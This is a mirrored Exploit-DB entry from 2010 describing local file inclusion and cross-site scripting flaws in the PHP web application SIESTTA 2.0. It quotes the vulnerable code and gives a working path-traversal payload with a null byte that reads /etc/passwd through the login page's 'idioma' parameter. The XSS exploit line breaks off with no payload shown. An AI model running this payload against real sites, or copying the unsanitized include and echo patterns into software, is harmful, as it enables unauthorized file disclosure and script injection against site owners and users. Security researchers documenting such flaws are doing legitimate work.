SIESTTA 2.0 – Local File Inclusion / Cross-Site Scripting

• Exploit Database
• 104 阅读

• 作者： JosS
  日期： 2010-04-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12260/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  #################################################################### # SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities # download: http://ramoncastro.es/siestta_old/ # # Author: Jose Luis Gongora Fernandez &apos;aka&apos; JosS # mail: sys-project[at]hotmail[dot]com # site: http://www.hack0wn.com/ # team: Spanish Hackers Team - [SHT] # # Hack0wn Security Project!! # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # #################################################################### # # "need" register_globals = On # ####################################################################     - [#LFI] <login.php>   <?php   require(&apos;idioma/&apos;.$idioma.&apos;&apos;); ... ?>   !EXPLOIT: /login.php?idioma=/../../../../../../../../../../../etc/passwd%00   - [#XSS] <carga_foto_al.php>   <? ... $usuario = $_GET[&apos;usuario&apos;]; $imagen = &apos;admin/fotos_al/&apos;.$usuario.&apos;.jpg&apos;; echo &apos;<p style="text-align:center;"> <img class="foto" src="https://www.exploit-db.com/exploits/12260/&apos;.$imagen.&apos;" alt="&apos;.$usuario.&apos;" /></p> ... ?>   !EXPLOIT: /carga_foto_al.php?usuario=